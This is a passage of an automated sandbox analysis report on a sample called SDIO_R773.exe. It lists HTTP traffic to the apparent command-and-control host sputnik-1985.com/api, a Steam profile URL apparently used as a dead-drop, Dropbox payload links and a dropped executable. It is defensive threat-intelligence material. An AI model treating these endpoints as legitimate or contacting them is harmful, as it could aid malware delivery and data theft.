                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: sputnik-1985.com
              Source: global traffic | HTTP traffic detected:
                  HTTP/1.1 403 Forbidden
                  Date: Sat, 11 Jan 2025 10:56:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  X-Frame-Options: SAMEORIGIN
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tzbaan%2BbMZdyza9E272uibNSfg7z6UnnCwAGXLx0u7W4u5ZuO4Y5bIz4JqTcM3eNkZKRC12A0S83xHaYDRgPB6nAfihUeGTeFK08wuc3QVp6Kj8FuB4uPxotxq5PpGxf%2BK3a"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 900460ffcfa77c6a-EWR
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067904046.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.2060769006.0000000000D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dropbox.com/iZ
              Source: SDIO_R773.exe, 00000000.00000002.2067904046.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.2060769006.0000000000D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dropbox.com/v
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drString found in binary or memory: https://forums.dropbox.com
              Source: SDIO_R773.exeString found in binary or memory: https://gcc.gnu.org/bugs/):
              Source: SDIO_R773.exeString found in binary or memory: https://github.com/arvidn/libtorrent/issues
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.st
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampo
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steamp
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1969046002.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958490684.00000000047DF000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067744653.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2066797770.0000000000CE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
              Source: SDIO_R773.exe, 00000000.00000003.2005003653.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067744653.0000000000D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiQ
              Source: SDIO_R773.exe, 00000000.00000003.1958490684.00000000047DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiW
              Source: SDIO_R773.exe, 00000000.00000003.2005093546.00000000047DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apii
              Source: SDIO_R773.exe, 00000000.00000003.1981585551.00000000047D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apijh
              Source: SDIO_R773.exe, 00000000.00000003.1958629667.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958490684.00000000047D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drString found in binary or memory: https://status.dropbox.com
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: SDIO_R773.exe, 00000000.00000003.1829580838.0000000004836000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: SDIO_R773.exe, 00000000.00000003.1830640311.000000000482D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1829580838.0000000004834000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958554125.000000000482D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958402349.000000000482D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: SDIO_R773.exe, 00000000.00000003.1830640311.0000000004808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: SDIO_R773.exe, 00000000.00000003.1830640311.000000000482D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1829580838.0000000004834000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958554125.000000000482D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958402349.000000000482D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: SDIO_R773.exe, 00000000.00000003.1830640311.0000000004808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/cd/0/get/Ch9Eke8i0BLC3-DtINknVGtnjncu
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/dE
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com:443/cd/0/get/Ch9Eke8i0BLC3-DtINknVGtn
              Source: SDIO_R773.exeString found in binary or memory: https://www.certum.pl/CPS0
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drString found in binary or memory: https://www.dropbox.com/help
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drString found in binary or memory: https://www.dropbox.com/home
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/js
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfj
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
